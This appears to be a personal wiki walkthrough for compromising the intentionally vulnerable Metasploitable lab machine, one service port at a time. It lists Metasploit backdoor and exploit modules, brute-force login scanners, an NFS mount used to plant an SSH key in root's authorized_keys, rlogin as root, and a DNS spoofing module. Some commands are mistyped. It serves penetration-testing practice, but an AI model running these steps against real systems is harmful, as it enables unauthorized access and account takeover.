Website Toolbase

Metasploitable OS Complete Solved

Port 21 & 2121

# Searching the ftp version
auxiliary/scanner/ftp/ftp_version
# Exploiting 2.3.4 Backdoor
exploit/unix/ftp/vsftpd_234_backdoor

### Port 2121
systemctl postgresql start
auxiliary/scanner/ftp/ftp_login
> ftp <ip> 2121

Port 22

auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/ssh/ssh_login

Port 23 & 1524

auxiliary/scanner/telnet/telnet_login
### Need to use Wireshark to inspect login credentials

ncat <ip> 1524

Port 25

# SMTP
auxiliary/scanner/smtp/smtp_enum
## Veryfying the users available on the internet

nc <machineIP> 25(port SMTP)
VRFY <username_Enumerated>

Port 53 ISC BIND (DNS)

Port 53 is used by DNS (Domain Name System).Berkeley Internet Name Domain DNS takes care of recolving human readable 'host names' into numeric IP addresses. A commonly used DNS server called BIND has had a rich history of security problems. As a result, BIND and port 53 are frequent targets and a couple worms used BIND exploits to propagate.

https://www.exploit-db.com/exploits/6122/
auxiliary/spoof/dns/bailiwicked_domain

Apache HTTPd 80

  • It is used to host the DVWA on the metasploitable OS but it also can be exploited.

nbtscan -r IPrange/24
dirb <ip>
http://<ip>/phpinfo.php
msf6> auxiliary/scanner/http/http_version
cadaver <website>/dav/
# A Linux terminal should pop-up

PORT 111/ 2049 RPC Bind

RPC - Remote Procedure Calls NFS - Network File system

rpc info -p <ip>
sudo mkdir -p /root/.ssh
cd /root/.ssh
### Generating SSH keys 
ssh-keygen -t rsa -b 4096
### Mounting the filesystem
mount -o nolock -t nfs <ip>:/ /mnt

### Listing the filesystems
df -k

cd /mnt/root/.ssh
cp /root/.ssh <filename> /mnt/root/.ssh

### To make ssh connection we need to extract the ssh authorized
key pair into the known authorized file

cat <publickey> >> authorized_keys

ssh -i /root/.ssh/<file> root@<ip>

Port 5900 VNC Viewer

auxiliary/scanner/vnc/vnc_login
vncviewer <ip>

Port 139-445 NetBIOS SSN

auxiliary/scanner/smb/smb_version
exploit/multi/samba/usermap_script

Port 512 513 514

  • These ports are also known as the remote login r services which is able to log in the systems using TCP Wrapper network access protocol

sudo apt install rsh-client
rlogin -l root <ip>

Port 1099 Java RMI server

auxiliary/scanner/misc/java_rmi_server
exploit/multi/misc/java_rmi_server

Port 3306

auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login

# On bruteforcing we get the password

mysql -u <user> -h <ip>


### Some Mysql Commands 
show databases;
use <database_name>;
show tables; 
describe <table_name>; (Select query)

Port 5432 Postgres

auxiliary/scanner/postgres/postgres_login
<default postgres pass>
psql -h <ip> -u <username>

Port 6667 Internal Relay Chat (IRC)

service postgresql start (IRC Requires a server to communicate with)
exploit/unix/irc/unreal_ircd_3281_backdoor
### IRC was built to prevent flooding 
Show playload 
set payload to ruby

Port 8180 (Unknown)

  • Port 8180 is used by the Apache tomcat service to run the java codes on the go....

Default password list github for apache tomcat based logins
exploit/multi/http/tomcat_mgr_upload

~ Ghoul

PreviousBattery Charge Threshold (Linux)NextTricking Windows

Last updated